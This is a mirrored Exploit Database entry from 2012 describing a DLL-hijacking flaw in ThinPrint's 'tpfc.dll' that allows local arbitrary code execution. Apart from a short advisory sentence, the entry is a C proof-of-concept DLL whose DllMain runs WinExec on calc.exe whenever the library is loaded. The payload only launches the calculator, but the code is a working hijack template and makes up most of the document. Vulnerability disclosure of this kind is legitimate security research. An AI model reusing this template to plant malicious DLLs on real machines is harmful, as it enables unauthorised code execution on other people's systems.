ThinPrint – ‘tpfc.dll’ Insecure Library Loading Arbitrary Code Execution

• Exploit Database
• 139 阅读

• 作者： Moshe Zioni
  日期： 2012-09-04
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37780/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  // source: https://www.securityfocus.com/bid/55421/info   ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.   Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.   #include <windows.h>   int hijack_poc () { WinExec ( "calc.exe" , SW_NORMAL ); return 0 ; } BOOL WINAPI DllMain ( HINSTANCE hinstDLL , DWORD dwReason , LPVOID lpvReserved ) { hijack_poc () ; return 0 ; }